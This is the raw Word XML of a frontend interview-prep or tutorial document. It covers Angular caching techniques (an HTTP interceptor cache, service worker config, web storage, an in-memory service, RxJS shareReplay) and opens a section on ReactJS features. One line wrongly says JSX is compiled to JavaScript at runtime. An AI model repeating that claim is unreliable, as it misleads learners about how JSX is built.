      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="18BB2E7C" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="713A85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 (Dependency Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D19FAE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 services into components or other services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="441F9C79" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FF318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hange Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF7FFD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nsure that the UI reflects the current data in the app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BC2A9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of these components plays an important role in building scalable and maintainable Angular applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F50CF" w14:textId="7BA0C062"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DD0BAF2">
          <v:rect id="_x0000_i3798" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2C0F8" w14:textId="122F6E3E" w:rsidR="00410D60" w:rsidRPr="00CE4B95" w:rsidRDefault="00300A27">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="931" w:name="_Toc197868145"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle caching in Angular</w:t>
      </w:r>
      <w:r w:rsidR="00410D60" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="931"/>
    </w:p>
    <w:p w14:paraId="202BCEDE" w14:textId="6BDC8676" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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HTTP Caching with Interceptors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6DE1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a feature to intercept HTTP requests and responses using </w:t>
      </w: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This can be used to cache API responses and avoid unnecessary network calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2DA1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HTTP caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4A37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n HttpInterceptor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A906F57"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 interceptor is used to intercept HTTP requests and responses, and you can add custom caching logic in this interceptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C254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16FF42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Event, HttpInterceptor, HttpHandler, HttpRequest } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEBD6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1FA59D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tap } from 'rxjs/operators';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93F845" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA83AF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2EB160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Interceptor implements HttpInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8235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Map&lt;string, any&gt; = new Map(); // Simple in-memory cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631A26C" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5930C8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tercept(req: HttpRequest&lt;any&gt;, next: HttpHandler): Observable&lt;HttpEvent&lt;any&gt;&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F87AF7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cachedResponse = this.cache.get(req.urlWithParams);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364069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cachedResponse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E4A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w Observable(observer =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FAE3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cachedResponse);  // Return cached response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B59D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9312E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EC8DF4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B29F125" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5314F0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xt.handle(req).pipe(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F097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ap(event =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A5A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event instanceof HttpResponse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD71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req.urlWithParams, event); // Store response in cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555185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6DD04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6DC2CF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7B55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382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A41048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 the Interceptor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B574632"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your </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>app.module.ts</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, add the CacheInterceptor to the providers array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CCA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_INTERCEPTORS } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576FBDA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import { CacheInterceptor } from './cache.interceptor';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAA38D" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF13EC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E030B9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFDC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vide: HTTP_INTERCEPTORS, useClass: CacheInterceptor, multi: true }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782362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7DF2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D4536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3E9188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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036AD1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request is made, the interceptor checks if the response is cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C53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 response is found in the cache, it is returned directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D57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therwise, it makes the HTTP request, stores the response in the cache, and then returns the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10456FC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ervice Worker Caching (Using PWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DDDB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supports Progressive Web Apps (PWAs), and you can leverage </w:t>
      </w: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to improve performance and offline capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24366A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Service Worker caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8AA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stall Angular PWA Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA568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to add PWA support to your Angular project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6FC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add @angular/pwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF75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onfiguration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC88E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automatically adds the ngsw-config.json file to your project, which defines the caching strategies for different resources, such as assets, APIs, and static content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC64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ify Caching Strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can modify caching strategies in the ngsw-config.json file to define which resources should be cached and the cache's expiration policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6BB5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configuration in ngsw-config.json:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056CF96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0A7C7B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 "/index.html",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA6A52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Groups": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719CC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3C3C7D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p-assets",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D73C7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stallMode": "prefetch",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34371FF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Mode": "prefetch",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1D0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sources": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29377CF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iles": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1BC6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avicon.ico",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336505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s/**",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45984E7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html"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05F1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20271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2C4D09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382DA5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0013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Groups": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540291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1876E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i-data",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F070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rls": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD01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https://api.example.com/data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27819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23618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cheConfig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062FC0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Size": 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BFD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Age": "1d",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB1A5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meout": "10s"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E502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C4B1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CD16F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9A1B8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C2D33A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uild the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23190F"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Once you set up the service worker, build your application with the --prod flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06851F4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build --prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0EB86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aching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5CCD8"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service worker caches files as per the configurations and will serve them from the cache when there is no network connection or when the network is slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E504A7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LocalStorage and SessionStorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39469D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For simple data caching that needs to persist across sessions, you can use </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650DE2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Stores data with no expiration, even when the browser is closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC8E9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 xml:space="preserve"> Stores data for the duration of the page session (i.e., until the page is reloaded or closed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E6B6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localStorage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C01C9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ocalStorage.setItem('userData', JSON.stringify({ name: 'John Doe', age: 30 }));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B981FBB" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3605FC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data from localStorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA59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userData = JSON.parse(localStorage.getItem('userData') || '{}');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E98C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sessionStorage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6F0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ssionStorage.setItem('sessionToken', '123456');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E241F2" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D08B2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session data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BADD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token = sessionStorage.getItem('sessionToken');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D9FF3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Memory Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E20D3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some cases, you might need to cache data temporarily within the application during the lifecycle of the app. For this, you can use a simple in-memory cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D91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4CA05B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EEE04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C2C1A8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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53031D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 new Map&lt;string, any&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994D992" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6B8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key: string): any {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6C5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cache.get(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06059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512A3FE" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572A0B3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t(key: string, value: any): void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FDCC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key, value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD2D9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7BA0DF6" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B671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lear(): void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3210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clear();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEA3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ABFC87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7B38FA"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aching API Calls with RxJS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445B94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4234722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710C85C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shareReplay } from 'rxjs/operators';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087613CB" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E2123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FE175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676CB32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2103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1D82ED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Cache: Observable&lt;any&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D564CE" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F890C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17B25AC8" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305165E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Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC002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if (!this.apiCache) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F943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apiCache = this.http.get('/api/data').pipe(shareReplay(1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55375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3954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apiCache;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607840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58E9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07A43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363302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offers multiple approaches for caching depending on your requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE9B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xml:space="preserve"> for caching HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B941C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offline in PWAs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14B2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sessionStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for persistent caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510399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memory caching</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for temporary data storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1230FFB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xJS operators</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like shareReplay to manage API call caching efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE843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techniques help improve the performance and user experience by reducing redundant network calls and enabling offline capabilities in Angular applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B7838E" w14:textId="648FFEA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799" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F09A22" w14:textId="57A4D2AA"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5813AE63" w14:textId="0CAF2DC5" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8719B" w:rsidP="00E8719B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="932" w:name="_Toc197868146"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>React</w:t>
      </w:r>
      <w:bookmarkEnd w:id="932"/>
    </w:p>
    <w:p w14:paraId="709A722E" w14:textId="77777777" w:rsidR="0011568F" w:rsidRPr="00CE4B95" w:rsidRDefault="0011568F" w:rsidP="0011568F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1210C589" w14:textId="207BD278" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="008531F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="933" w:name="_Toc197868147"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Features of ReactJS</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="933"/>
    </w:p>
    <w:p w14:paraId="4A9928CD" w14:textId="084E487C" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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 popular JavaScript library for building user interfaces, especially for single-page applications (SPAs). Here are some key features of ReactJS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF24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Based Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCAFA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is based on the concept of components, which are reusable and independent building blocks that make up the UI. Components can be either </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional</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class-based</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004BDF6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component has its own state and props, making it modular and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C659B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 hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps in creating a structured UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DBA5F"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JSX (JavaScript XML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1193A96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is a syntax extension for JavaScript that allows HTML-like code to be written within JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6948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is compiled to JavaScript at runtime, making it easy to write and understand UI code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0DF80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makes it easy to define UI structure directly in the code, improving readability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F038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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8BD5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to efficiently update the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F74910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the state of a component changes, React first updates the Virtual DOM and then compares it with the previous Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC1B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erence (called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is then reflected in the real DOM in the most efficient way possible, leading to better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC37B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One-Way Data Binding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545226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one-way data binding</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning data flows in one direction, from parent to child components via </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>props</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E90274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it easier to debug, as you can trace the flow of data in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3FA3D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tate Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D28E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allows components to manage their own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which is used to store data that can change over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3395F4F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hooks such as useState and useEffect for managing state and side effects in functional components.</w:t>
      </w:r>
